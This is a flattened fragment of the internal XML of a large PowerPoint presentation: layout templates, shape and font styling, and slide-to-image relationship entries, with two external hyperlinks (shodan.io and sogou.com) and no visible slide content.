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lvl1pPr>
    <a:lvl2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lvl2pPr>
    <a:lvl3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lvl3pPr>
    <a:lvl4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lvl4pPr>
    <a:lvl5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lvl5pPr>
    <a:lvl6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lvl6pPr>
    <a:lvl7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lvl7pPr>
    <a:lvl8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lvl8pPr>
    <a:lvl9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2E8"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E6EA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E7CB"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="F8F4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CDDE"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="EBE8E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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Ligh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 Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide152.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide153.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide154.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide155.xml"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide156.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide157.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p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 14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Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="1638300"/>
            <a:ext cx="10464800" cy="3302000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 12"/>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Shape 93"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="6362700"/>
            <a:ext cx="10464800" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="740833" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1185333" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1629833" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2074333" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4267200"/>
            <a:ext cx="10464800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3800"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 9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Shape 102"/>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hape 10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hape 11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Defau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7" name="Shape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13548" y="-11290"/>
            <a:ext cx="13031894" cy="14811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 y="66"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10276" y="3326"/>
                  <a:pt x="14325" y="12084"/>
                  <a:pt x="16368" y="12084"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18412" y="12084"/>
                  <a:pt x="20679" y="5005"/>
                  <a:pt x="21578" y="1811"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="7013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21218" y="8462"/>
                  <a:pt x="18771" y="14521"/>
                  <a:pt x="16099" y="14455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13427" y="14389"/>
                  <a:pt x="8252" y="5433"/>
                  <a:pt x="5568" y="6618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2807" y="6882"/>
                  <a:pt x="1010" y="15871"/>
                  <a:pt x="0" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="22" y="66"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="00EBF8">
                  <a:alpha val="54998"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0079AF">
                  <a:alpha val="44999"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231466" y="-11291"/>
            <a:ext cx="6773335" cy="863605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="20552" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1253" y="3703"/>
                  <a:pt x="8410" y="19349"/>
                  <a:pt x="12010" y="20475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15610" y="21600"/>
                  <a:pt x="20002" y="10128"/>
                  <a:pt x="21600" y="6752"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="009BE5">
                  <a:alpha val="44999"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="00ADB6">
                  <a:alpha val="29998"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="image3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-40641" y="-29352"/>
            <a:ext cx="13045443" cy="1478846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8951342" y="8864143"/>
            <a:ext cx="368767" cy="351999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65022" tIns="65022" rIns="65022" bIns="65022" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="1300480">
              <a:defRPr b="1" sz="1600">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127" name="Shape 127"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="444500" indent="-444500"/>
            <a:lvl2pPr marL="1333500" indent="-889000"/>
            <a:lvl3pPr marL="1778000" indent="-889000"/>
            <a:lvl4pPr marL="2222500" indent="-889000"/>
            <a:lvl5pPr marL="2667000" indent="-889000"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 129"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9046503" y="8905523"/>
            <a:ext cx="273605" cy="269237"/>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Defau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6" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285653" y="8779792"/>
            <a:ext cx="3034454" cy="520701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="1300480">
              <a:defRPr b="1" sz="1600">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Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606550" y="635000"/>
            <a:ext cx="9779000" cy="5918200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="6718300"/>
            <a:ext cx="10464800" cy="1422400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>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hape 23"/>
          <p:cNvSpPr/>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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3225800"/>
            <a:ext cx="10464800" cy="3302000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</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Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6718300" y="635000"/>
            <a:ext cx="5334000" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>
          <p:cNvSpPr/>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Shape 40"/>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hape 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a:r>
              <a:t>Title Text</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Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>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hape 5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Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6718300" y="2603500"/>
            <a:ext cx="5334000" cy="6286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>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hape 6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Shape 75"/>
          <p:cNvSpPr/>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hape 7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Shape 83"/>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Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724518" y="889000"/>
            <a:ext cx="5334002" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>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hape 8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Shape 3"/>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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9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Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="533400" marR="0" indent="-5334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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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Helvetica Light"/>
          <a:ea typeface="Helvetica Light"/>
          <a:cs typeface="Helvetica Light"/>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0.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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3.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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4.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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5.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.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10.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1.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide11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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide11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3.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2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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide12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6.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide122.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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide12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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide12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0.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide12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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide12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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide128.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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.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3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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide13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133.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38.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide134.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39.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide135.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41.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide136.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43.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide137.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44.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide138.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46.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide139.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47.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.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140.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49.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide141.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51.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide142.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52.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide143.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53.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide144.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145.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54.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide146.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55.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide147.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56.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide148.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58.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide149.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59.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150.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60.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide151.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61.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide152.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62.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide153.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64.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide154.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65.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide155.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66.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide156.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67.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide157.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shodan.io/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sogou.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.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34.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4.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5.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8.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9.pn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0.png"/></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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/></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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 